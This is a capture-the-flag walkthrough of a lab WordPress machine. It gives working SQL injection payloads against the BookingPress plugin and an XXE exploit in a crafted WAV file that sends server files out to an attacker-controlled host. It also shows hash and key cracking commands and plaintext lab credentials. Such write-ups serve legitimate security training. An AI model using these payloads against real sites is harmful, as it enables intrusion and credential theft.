TCP Scan

> TARGET=10.129.65.154 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp?    syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0

• Add metapress.htb to /etc/hosts
• 21 ftp requires credential, nothing to do for now
• Try 80, this appears to be a WordPress site.

Web Enum

wpscan --url http://metapress.htb -e p,u --plugins-detection aggressive

• There is a booking app at http://metapress.htb/events/

# Make a booking and received an appointment id
http://metapress.htb/thank-you/?appointment_id=MQ==

# Inspecting the source of the page found several references as follow
<link rel='stylesheet' id='bookingpress_tel_input-css'  href='http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/bookingpress_tel_input.css?ver=1.0.10' media='all' />

• This booking app is BookingPress version 1.0.10
• Searching for exploits lead to this: https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

SQLi

• As describe, we need to get a valid nonce to work with. This can be found be creating an event using BookingPress, and in the network traffic, there is a new parameter called _wpnonce where you can get the nonce value.
• Then, follow the example payload from the link to test the theory.

> curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=ad24ffd7e3&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]

• Note that the vervion value and version comment can be extracted and returned on bookingpress_service_id and bookingpress_category_id
• Trial and error with sqli techniques and eventually lead to the following credentials in the database

> curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=ad24ffd7e3&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'

[{"bookingpress_service_id":"admin,manager","bookingpress_category_id":"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.,$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}] 

Hash cracking

• Crack the hashes, note that the second hash has a leading \ for character escaping, remove it before cracking. manager password can be cracked: partylikearockstar

> hashcat.exe -m 400 -a 0 hash.txt rockyou.txt

Foothold

• Login to http://metapress.htb/wp-admin/ using the previously cracked credential
• After login, we learnt the wordpress version is 5.6.2: http://metapress.htb/wp-admin/about.php
• There are multiple vulnerabilities in this version: https://www.acunetix.com/vulnerabilities/web/wordpress-5-6-x-multiple-vulnerabilities-5-6-5-6-2/
• Try this exploit: https://github.com/motikan2010/CVE-2021-29447

# Run the web server
> make up-mal

# Change the content in attacker/www/evil.dtd to match your ip
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://<ip>:8001/?p=%file;'>" >

# Generate a malicious payload
> echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<ip>:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

# Upload the .wav file to http://metapress.htb/wp-admin/upload.php and receive the returned results
[Sun Oct 30 17:06:01 2022] 10.129.65.154:54694 [404]: GET /?p=<base64_zipped> - No such file or directory

# Then decode and upzip the result
<?php
echo zlib_decode(base64_decode('<returned_value>'));
?>

• We learnt that there is a user at /home/jnelson
• Now, we have a way to read file on the target, then we can attempt several reads hopefully to find the user’s password some where. To change the file being read, just change the attacker/www/evil.dtd file and upload the .wav payload.

# Read /etc/nginx/sites-enabled/default to locate the website folder
root /var/www/metapress.htb/blog;

# Read wordpres config file /var/www/metapress.htb/blog/wp-config.php
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

• We have the credential for ftp, login to ftp

> ftp ftp.metapress.htb

# Check the content of send_email.php
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;                          
$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";                           
$mail->SMTPSecure = "tls";                           
$mail->Port = 587;

• Login as jnelson to get the user flag

PE

• Upload linpeas, note there is a passpie process, which corresponds to a password manager app: https://github.com/marcwebbie/passpie

[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
6061      sed-Es,/dev/mqueue|/dev/shm|/home/jnelson|/home/jnelson/.local|/home/jnelson/.local/share|/home/jnelson/.local/share/nano|/home/jnelson/.passpie|/home/jnelson/.passpie/ssh|/run/lock|/run/user/1000|/run/user/1000/systemd|/run/user/1000/systemd/inaccessible|/run/user/1000/systemd/inaccessible/dir|/tmp|/tmp/.font-unix|/tmp/.ICE-unix|/tmp/.Test-unix|/tmp/.X11-unix|/tmp/.XIM-unix|/var/lib/php/sessions|/var/tmp

• There is a pgp private key file, copy only the private key part of the file

[+] Searching ssl/ssh files
Possible private SSH keys were found!
/home/jnelson/.passpie/.keys

• Crack the private key

# Convert to john crackable format
> gpg2john private.key > hash
# Crack using john
> john --wordlist=/usr/share/wordlists/rockyou.txt hash

• Get root password from passpie and PE to root to get the flag

> passpie copy ssh --to stdout
Passphrase: 
p7qfAZt4_A1xo_0x
> su